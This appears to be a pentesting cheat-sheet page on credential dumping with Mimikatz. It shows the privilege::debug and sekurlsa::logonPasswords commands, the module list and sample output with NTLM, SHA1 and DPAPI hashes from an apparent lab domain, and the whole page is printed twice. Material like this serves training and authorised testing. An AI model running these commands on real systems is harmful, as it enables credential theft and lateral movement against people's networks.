Pentesting Quick Reference OSCP and Beyond

Mimikatz

PreviousBreached Credentials NextLinux Remote Management Protocols

Last updated 2 days ago

Mimikatz

Credentials Dumping with Mimikatz

Set privilege mode to debug (After running it as admin)

C:\Users\pparker\Downloads\mimikatz_trunk\x64>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

Checking available modules

mimikatz # sekurlsa::
ERROR mimikatz_doLocal ; "(null)" command of "sekurlsa" module not found !

Module :        sekurlsa
Full name :     SekurLSA module
Description :   Some commands to enumerate credentials...

             msv  -  Lists LM & NTLM credentials
         wdigest  -  Lists WDigest credentials
        kerberos  -  Lists Kerberos credentials
           tspkg  -  Lists TsPkg credentials
         livessp  -  Lists LiveSSP credentials
         cloudap  -  Lists CloudAp credentials
             ssp  -  Lists SSP credentials
  logonPasswords  -  Lists all available providers credentials
         process  -  Switch (or reinit) to LSASS process  context
        minidump  -  Switch (or reinit) to LSASS minidump context
         bootkey  -  Set the SecureKernel Boot Key to attempt to decrypt LSA Isolated credentials
             pth  -  Pass-the-hash
          krbtgt  -  krbtgt!
     dpapisystem  -  DPAPI_SYSTEM secret
           trust  -  Antisocial
      backupkeys  -  Preferred Backup Master keys
         tickets  -  List Kerberos tickets
           ekeys  -  List Kerberos Encryption Keys
           dpapi  -  List Cached MasterKeys
         credman  -  List Credentials Manager

See logon passwords

mimikatz # sekurlsa::logonPasswords

Authentication Id : 0 ; 426939 (00000000:000683bb)
Session           : Interactive from 1
User Name         : pparker
Domain            : MARVEL
Logon Server      : HYDRA-DC
Logon Time        : 5/26/2025 10:25:53 PM
SID               : S-1-5-21-817282392-3664699690-768258319-1106
        msv :
         [00000003] Primary
         * Username : pparker
         * Domain   : MARVEL
         * NTLM     : 64f12cddaa88057e06a81b54e73b949b
         * SHA1     : cba4e545b7ec918129725154b29f055e4cd5aea8
         * DPAPI    : 220a3e34eaf9b45b4bc0f153f861610b
        tspkg :
        wdigest :
         * Username : pparker
         * Domain   : MARVEL
         * Password : (null)
        kerberos :
         * Username : pparker
         * Domain   : MARVEL.LOCAL
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 426917 (00000000:000683a5)
Session           : Interactive from 1
User Name         : pparker
Domain            : MARVEL
Logon Server      : HYDRA-DC
Logon Time        : 5/26/2025 10:25:53 PM
SID               : S-1-5-21-817282392-3664699690-768258319-1106
        msv :
         [00000003] Primary
         * Username : pparker
         * Domain   : MARVEL
         * NTLM     : 64f12cddaa88057e06a81b54e73b949b
         * SHA1     : cba4e545b7ec918129725154b29f055e4cd5aea8
         * DPAPI    : 220a3e34eaf9b45b4bc0f153f861610b
        tspkg :
        wdigest :
         * Username : pparker
         * Domain   : MARVEL
         * Password : (null)
        kerberos :
         * Username : pparker
         * Domain   : MARVEL.LOCAL
         * Password : (null)
        ssp :
        credman :
        cloudap :

PreviousBreached Credentials NextLinux Remote Management Protocols

Last updated 2 days ago

Credentials Dumping with Mimikatz

Set privilege mode to debug (After running it as admin)

C:\Users\pparker\Downloads\mimikatz_trunk\x64>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

Checking available modules

mimikatz # sekurlsa::
ERROR mimikatz_doLocal ; "(null)" command of "sekurlsa" module not found !

Module :        sekurlsa
Full name :     SekurLSA module
Description :   Some commands to enumerate credentials...

             msv  -  Lists LM & NTLM credentials
         wdigest  -  Lists WDigest credentials
        kerberos  -  Lists Kerberos credentials
           tspkg  -  Lists TsPkg credentials
         livessp  -  Lists LiveSSP credentials
         cloudap  -  Lists CloudAp credentials
             ssp  -  Lists SSP credentials
  logonPasswords  -  Lists all available providers credentials
         process  -  Switch (or reinit) to LSASS process  context
        minidump  -  Switch (or reinit) to LSASS minidump context
         bootkey  -  Set the SecureKernel Boot Key to attempt to decrypt LSA Isolated credentials
             pth  -  Pass-the-hash
          krbtgt  -  krbtgt!
     dpapisystem  -  DPAPI_SYSTEM secret
           trust  -  Antisocial
      backupkeys  -  Preferred Backup Master keys
         tickets  -  List Kerberos tickets
           ekeys  -  List Kerberos Encryption Keys
           dpapi  -  List Cached MasterKeys
         credman  -  List Credentials Manager

See logon passwords

mimikatz # sekurlsa::logonPasswords

Authentication Id : 0 ; 426939 (00000000:000683bb)
Session           : Interactive from 1
User Name         : pparker
Domain            : MARVEL
Logon Server      : HYDRA-DC
Logon Time        : 5/26/2025 10:25:53 PM
SID               : S-1-5-21-817282392-3664699690-768258319-1106
        msv :
         [00000003] Primary
         * Username : pparker
         * Domain   : MARVEL
         * NTLM     : 64f12cddaa88057e06a81b54e73b949b
         * SHA1     : cba4e545b7ec918129725154b29f055e4cd5aea8
         * DPAPI    : 220a3e34eaf9b45b4bc0f153f861610b
        tspkg :
        wdigest :
         * Username : pparker
         * Domain   : MARVEL
         * Password : (null)
        kerberos :
         * Username : pparker
         * Domain   : MARVEL.LOCAL
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 426917 (00000000:000683a5)
Session           : Interactive from 1
User Name         : pparker
Domain            : MARVEL
Logon Server      : HYDRA-DC
Logon Time        : 5/26/2025 10:25:53 PM
SID               : S-1-5-21-817282392-3664699690-768258319-1106
        msv :
         [00000003] Primary
         * Username : pparker
         * Domain   : MARVEL
         * NTLM     : 64f12cddaa88057e06a81b54e73b949b
         * SHA1     : cba4e545b7ec918129725154b29f055e4cd5aea8
         * DPAPI    : 220a3e34eaf9b45b4bc0f153f861610b
        tspkg :
        wdigest :
         * Username : pparker
         * Domain   : MARVEL
         * Password : (null)
        kerberos :
         * Username : pparker
         * Domain   : MARVEL.LOCAL
         * Password : (null)
        ssp :
        credman :
        cloudap :